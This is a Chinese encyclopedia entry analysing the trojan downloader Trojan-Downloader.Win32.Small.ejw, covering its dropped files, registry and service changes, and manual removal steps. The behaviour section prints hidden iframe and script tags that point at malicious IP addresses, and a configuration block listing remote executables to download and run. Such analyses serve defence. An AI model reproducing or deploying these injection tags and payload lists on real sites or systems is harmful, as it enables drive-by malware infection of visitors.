请输入您要查询的百科知识:

 

词条 Trojan-Downloader.Win32.Small.ejw
释义

Trojan-Downloader.Win32.Small.ejw病毒属木马类,病毒伪装微软版本信息,用以迷惑用户。病毒运行后衍生病毒文件到系统目录下,连接网络下载病毒文件,修改注册表,创建服务,并以服务的方式达到随机启动的目的,删除系统正常服务。尝试结束卡巴斯基进程。

病毒标签

病毒名称: Trojan-Downloader.Win32.Small.ejw

病毒类型: 木马

文件 MD5: 216221B8289779DAAB7405089391684F

公开范围: 完全公开

危害等级: 4

文件长度: 19,788 字节

感染系统: windows98以上版本

开发工具: Microsoft Visual C++ 6.0

加壳类型: Xtreme-Protector v1.05

行为分析

1 、衍生病毒文件到系统目录下:

%system32%\\d26bf5b8.dll

%system32%\\d26bf5b8.exe

%system32%\\d26bf5b8t.exe

2 、修改注册表:

HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\D26BF5B8\\ImagePath

值 : 字符串: "C:\\WINDOWS\\system32\\D26BF5B8.EXE -service"

3 、开启服务:

服务名称: D26BF5B8

显示名称: D26BF5B8

描述: D26BF5B8

可执行文件的路径: C:\\WINDOWS\\system32\\D26BF5B8.EXE

启动方式:自动

4 、关闭系统正常服务 ERSVC:

HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\ERSvc

键值 : 字串: "Description"="服务和应用程序在非标准环境下运行时允许错误报告"

5 、连接网络:

<script language="javascript"

src="http://count6.51yes.com/click.aspx?id=63610940&logo=1"></script>

<iframe height="0" width="0"

src="http://59.34.197.164:81/808080/ad2881.asp"></iframe>

<iframe height="0" width="0"

src="http://59.34.197.164:81/80444/ad2715fg.asp"></iframe>

<iframe height="0" width="0" src="http://www.sxrf.gov.cn"></iframe>

<iframe height="0" width="0"

src="http://59.34.197.164:81/88888/ad56d.asp"></iframe>

<iframe height="0" width="0" src="http://www.gansusteel.com"></iframe>

<iframe height="0" width="0" src="http://www.east128.com/about.asp"></iframe>

<iframe height="0" width="0" src="http://dongman.0937.net"></iframe>

<iframe height="0" width="0" src="http://suremo.cn"></iframe>

<iframe height="0" width="0" src="http://www.jkdj.cn"></iframe>

<iframe height="0" width="0" src="http://www.cnkmd.com"></iframe>

<iframe height="0" width="0" src="http://www.xinwanyu.com"></iframe>

<iframe height="0" width="0" src="http://hejianwu.com"></iframe>

<iframe height="0" width="0" src="http://59.34.197.164:81/80465551/ad28781.asp">

/iframe>

<iframe height="0" width="0"

src="http://59.34.197.164:81/808080/ad2881.asp"></iframe>

<iframe src='http://59.34.197.239/in.asp?newwebname=1' width='0' height='0'

frameborder='0'></iframe>

<script language="javascript" src="http://59.34.197.239/in.js"></script>

6 、该木马有盗取用户敏感信息的功能,连接网络,下载病毒文件到本机运行:

[update]

ver=0

url=http://127.0.0.1/

timer=1

[startpage]

startpage=0

url=http://www.sina.com.cn1

[favorites]

favorites=0

count=0

[desktop]

desktop=0

count=0

[popwin]

popwin=0

count=0

[addrpop]

addrpop=0

[alexa]

alexa=1

fileurl=http://www.al*x*.com/1.exe

url1=http://nba.9*6*k.com/2.htm

url2=http://5*.3*.1*7.1*4:81/808080/ad2881.asp

rl3=http://5*.3*.1*7.1*4:81/80444/ad2715fg.asp

url4=http://5*.3*.1*7.1*4:81/8046338888/ad285367.asp

url5=http://5*.3*.1*7.1*4:81/8046555/ad2878.asp

url6=http://5*.3*.1*7.1*4:81/80444/ad2715.asp

url7=http://www.u**s*e.com/top.html

url8=http://www.it*o*ns.com

url9=http://www.j*d*.cn

url10=http://www.*x*f.gov.cn

url11=http://www.g*ns*st*el.com

url12=http://5*.3*.1*7.1*4:81/88888/ad56d.asp

url13=http://www.y*h*l*ng.com

url14=http://5*.3*.1*7.1*4:81/8046222/ad2714.asp

url15=http://5*.3*.1*7.1*4:81/80465551/ad28781.asp

count=15

[im]

im=0

msg= 你好啊,兄弟! http://www.s*n*.com.cn

qq=0

popo=0

uc=0

taobao=0

[file]

file=1

file1=http://www.t*o1*81*8.com/mh.exe

filename1=sthu1.exe

file2=http://h&inf*lm.cn/obug.exe

filename2=sthu2.exe

file3=http://www.t*o1*81*8.com/qq.exe

filename3=sthu3.exe

file4=http://imgbbs.sh*ngd*.com/bbs.shangdu.com/3/227/464355/file/gz.exe

filename4=sthu4.exe

file5=http://www.t*o1*81*8.com/12.exe

filename5=sthu5.exe

file6=http://www.y*-m*ng.com/bbs/geawe/fsgd/treter/1.exe

filename6=sthu6.exe

file7=http://www.t*o1*81*8.com/yk.exe

filename7=sthu7.exe

file8=http://jd.54l*um*ng.com/lm/one.exe

filename8=sthu8.exe

count=8

[count]

count=1

mecount=1

url=http://nba.9*6*k.com/lm/count/count.asp

7 、该病毒尝试关闭卡巴斯基进程。

注: % System%是一个可变路径。病毒通过查询操作系统来决定当前System文件夹的位置。Windows2000/NT中默认的安装路径是C:\\Winnt\\System32,windows95/98/me中默认的安装路径是C:\\Windows\\System,windowsXP中默认的安装路径是C:\\Windows\\System32。

清除方案

1 、 使用安天木马防线可彻底清除此病毒 ( 推荐 )

2 、 手工清除请按照行为分析删除对应文件,恢复相关系统设置。

(1) 使用 安天木马防线 “进程管理”关闭病毒进程

终止所有IE进程

(2) 删除病毒文件

%system32%\\d26bf5b8.dll

%system32%\\d26bf5b8.exe

%system32%\\d26bf5b8t.exe

(3) 恢复病毒修改的注册表项目,删除病毒添加的注册表项

终止服务

D26BF5B8

随便看

 

百科全书收录4421916条中文百科知识,基本涵盖了大多数领域的百科知识,是一部内容开放、自由的电子版百科全书。

 

Copyright © 2004-2023 Cnenc.net All Rights Reserved
更新时间:2025/2/22 3:52:44